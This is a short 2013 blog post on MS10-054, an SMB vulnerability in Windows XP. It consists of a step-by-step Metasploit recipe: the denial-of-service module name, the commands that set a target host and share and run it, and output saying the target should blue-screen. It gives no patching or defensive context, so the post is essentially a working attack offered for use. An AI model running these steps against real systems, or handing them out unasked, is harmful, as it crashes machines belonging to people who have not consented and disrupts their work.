Friday, March 29, 2013

MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution


Bugs : MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution
OS : Windows XP SP 0/1
Level : Critical

Metasploit module : auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow

Use : 
  1. use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
  2. set RHOST target_ip
  3. set SMBSHARE target_share_folder_name
  4. run

Output : 
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed

Cause : BSOD on target machine

No comments:

Post a Comment